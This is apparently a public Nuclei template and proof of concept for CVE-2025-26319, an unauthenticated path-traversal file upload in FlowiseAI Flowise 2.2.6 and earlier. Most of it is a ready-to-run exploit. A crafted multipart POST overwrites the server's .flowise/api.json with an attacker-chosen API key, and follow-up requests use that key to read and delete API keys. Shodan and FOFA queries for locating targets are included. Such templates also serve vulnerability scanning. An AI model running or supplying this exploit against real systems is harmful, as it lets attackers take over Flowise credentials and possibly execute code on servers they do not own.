FlowiseAI Flowise version 2.2.6 and below contains an arbitrary file upload vulnerability in the /api/v1/attachments endpoint. This vulnerability allows an unauthenticated attacker to upload files outside the intended directory through path traversal, potentially leading to API key exposure and remote code execution. The vulnerability can be exploited by uploading a malicious file to overwrite the .flowise/api.json configuration file.
PoC代码[已公开]
id: CVE-2025-26319
info:
name: FlowiseAI Flowise <= 2.2.6 - Arbitrary File Upload
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
FlowiseAI Flowise version 2.2.6 and below contains an arbitrary file upload vulnerability in the /api/v1/attachments endpoint. This vulnerability allows an unauthenticated attacker to upload files outside the intended directory through path traversal, potentially leading to API key exposure and remote code execution. The vulnerability can be exploited by uploading a malicious file to overwrite the .flowise/api.json configuration file.
reference:
- https://github.com/advisories/GHSA-69jq-qr7w-j7qh
- https://github.com/FlowiseAI/Flowise
- https://nvd.nist.gov/vuln/detail/CVE-2025-26319
classification:
epss-score: 0.81041
epss-percentile: 0.99122
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2025-26319
cwe-id: CWE-434
metadata:
verified: true
max-request: 3
vendor: FlowiseAI
product: Flowise
shodan-query: title:"Flowise"
fofa-query: title="Flowise"
tags: cve,cve2025,flowise,fileupload,intrusive,vkev
flow: http(1) && http(2)
http:
- raw:
- |
POST /api/v1/attachments/..%2f..%2f..%2f..%2f..%2froot%2f/.flowise HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydTh0yj8zypRgPT1w
------WebKitFormBoundarydTh0yj8zypRgPT1w
Content-Disposition: form-data; name="files";filename="api.json"
Content-type: text/plain
[{
"keyName":"=",
"apiKey":"24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ",
"apiSecret":"8648f55db62716a6577b565efb66145b9ad8c50884c57ae8d4f03c4cd8b3ee27b1f77804d320f08bac8aa4b0dbf58a39dacbb767eb05efe1e57d5c66e5d48473.af4b3f229bd11ac5",
"createdAt":"111",
"id":"1111"
}]
------WebKitFormBoundarydTh0yj8zypRgPT1w--
matchers:
- type: word
part: body
words:
- 'name":'
- 'mimeType":"text/plain'
condition: and
internal: true
- raw:
- |
GET /api/v1/apikey HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ
- |
DELETE /api/v1/apikey/1111 HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'apiKey":"'
- 'apiSecret":'
- 'chatFlows'
condition: and
- type: status
status:
- 200
# digest: 490a00463044022061841e21ccdba3d36ecc98b8c26bb0e70c1545b3d08805ab3916d58775fb842f022039814699f6aa1af37f497e387277e266b5e3196ac88e4491248c90839d10eb8d:922c64590222798bb761d5b6d8e72950